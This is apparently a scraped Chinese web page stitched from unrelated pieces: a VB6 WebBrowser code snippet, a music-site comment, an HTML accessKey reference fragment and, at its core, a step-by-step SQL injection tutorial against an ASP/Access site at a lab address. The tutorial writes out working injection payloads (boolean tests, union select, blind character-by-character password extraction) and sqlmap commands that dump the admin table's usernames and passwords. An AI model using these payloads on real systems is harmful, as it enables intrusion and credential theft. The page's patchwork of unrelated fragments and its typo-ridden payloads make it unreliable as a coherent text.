要代碼:
Dim doc, objhtml As Object
Dim i As Integer
Dim strhtml As String
If Not Me.WebBrowser1.Busy Then
Set doc = WebBrowser1.Document
i = 0
Set objhtml = doc.body.createtextrange()
If Not IsNull(objhtml) Then
Text1 = objhtml.htmltext
End If
End If
?
示例下載:( 在“了解更多”里下載)
圖 示:
鐘書在《圍成》里寫到:“約著見一面,就能使見面的前后幾天都沾著光,變成好日子”,是啊,只要能見你,雀躍的心情都會被拉得好長好長。感情就是這樣,原則抵不過我樂意,你有你的打算,我有我的目的,因為我喜歡你,我所做的一切都是想跟你在一起。。。
---- 網(wǎng)易云熱評
一、網(wǎng)站分類
1、靜態(tài)網(wǎng)頁
html或者h(yuǎn)tm是靜態(tài)頁面,不需要服務(wù)器解析其中的腳本
特點(diǎn):不依賴數(shù)據(jù)庫,靈活性差,制作、更新、維護(hù)麻煩,交互性差,功能受限制,安全,不存在數(shù)據(jù)庫注入漏洞
2、動態(tài)頁面
asp/aspx/php/jsp等,由相應(yīng)的腳本引擎來解釋執(zhí)行
特點(diǎn):以來數(shù)據(jù)庫,靈活性好、交互性好、不安全,存在數(shù)據(jù)庫注入漏洞
二、網(wǎng)站訪問流程
三、漏洞產(chǎn)生原因
目標(biāo)網(wǎng)址:www.aiyou.com/new.php?id=23
1、正常流程數(shù)據(jù)庫返回給網(wǎng)站new頁面id為23的信息
2、將參數(shù)值23修改為其他的sql語句
3、網(wǎng)站未對該指令進(jìn)行檢測
4、服務(wù)器執(zhí)行了新的語句,并返回給網(wǎng)站
5、客戶端根據(jù)返回的信息可以繼續(xù)進(jìn)一步注入
四、sql注入的危害
1、數(shù)據(jù)庫信息泄露
2、網(wǎng)頁被篡改
3、網(wǎng)頁被掛馬
4、數(shù)據(jù)庫被惡意操作
5、服務(wù)器被遠(yuǎn)程控制
6、破快硬盤數(shù)據(jù)
五、access數(shù)據(jù)庫
一般配合asp腳本使用,存儲數(shù)據(jù)不能大于100M,只有一個數(shù)據(jù)庫名稱,可以創(chuàng)建多個表
1、數(shù)據(jù)庫后綴:*.mdb
2、asp鏈接access數(shù)據(jù)庫
<%
dim conn,connstr,db
db="Your.mdb"
Set conn = Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>
3、常用打開工具EasyAccess
4、漏洞判斷
目標(biāo):http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
判斷注入點(diǎn):
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ 報錯,可能存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 返回正常
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 返回錯誤 存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exsits (select * from msysobjects) > 0 判斷access數(shù)據(jù)庫,根據(jù)錯誤提示在msysobjects上沒有讀取數(shù)據(jù)權(quán)限,說明表存在,從而知道是access數(shù)據(jù)庫
5、查詢access數(shù)據(jù)空中的表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from user) 根據(jù)錯誤判斷除滅有user表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from admin) 正常返回,說明存在admin表
6、判斷列名
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin),正常返回,說明存在列名password
常用用戶名:name username user_name admin adminuser admin_user admin_username adminname
常用密碼名:password pass userpass user_pass pwd userpwd adminpwd admin_pwd
7、判斷表的列數(shù)
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 ,正常返回說明有22列,如果沒有正常繼續(xù)修改該數(shù)字
8、聯(lián)合查詢
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin,知道admin表一共有22列,所以聯(lián)合查詢需要輸入1-22,頁面只顯示3和15,可以修改該兩列獲取想要的數(shù)值
六、另一種方法判斷:
1、http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and select len(password) from admin)=16 判斷密碼的長度,返回正常,說明密碼長度為16。
2、 http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 判斷密碼的第一位,返回正常,說明密碼的第一位是a
判斷第二位,成功后修改該值,依次判斷剩下的密碼
七、sqlmap工具利用
目標(biāo)地址:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
1、測試是否存在漏洞
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513"
2、獲取表名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --tables
3、獲取列名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin
4、獲取指定列的內(nèi)容
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" -T admin -C admin,password --dump
禁止非法,后果自負(fù)
歡迎關(guān)注公眾號:web安全工具庫
義和用法
accessKey 屬性設(shè)置或返回元素的快捷鍵。
快捷鍵規(guī)定激活元素或使元素獲得焦點(diǎn)的快捷鍵。
注釋:在不同的瀏覽器中訪問快捷鍵的方式各有不同
IE、Chrome、Safari 使用 [Alt] + accessKey 為擁有指定快捷鍵的元素賦予焦點(diǎn)。
Firefox 使用 [Alt] [Shift] + accesskey 獲取焦點(diǎn);
語法
HTMLElementObject.accessKey=accessKey
在Chrome瀏覽器中安Alt + S 就會獲取焦點(diǎn)
提示:如果超過一個元素?fù)碛邢嗤目旖萱I,那么:
*請認(rèn)真填寫需求信息,我們會在24小時內(nèi)與您取得聯(lián)系。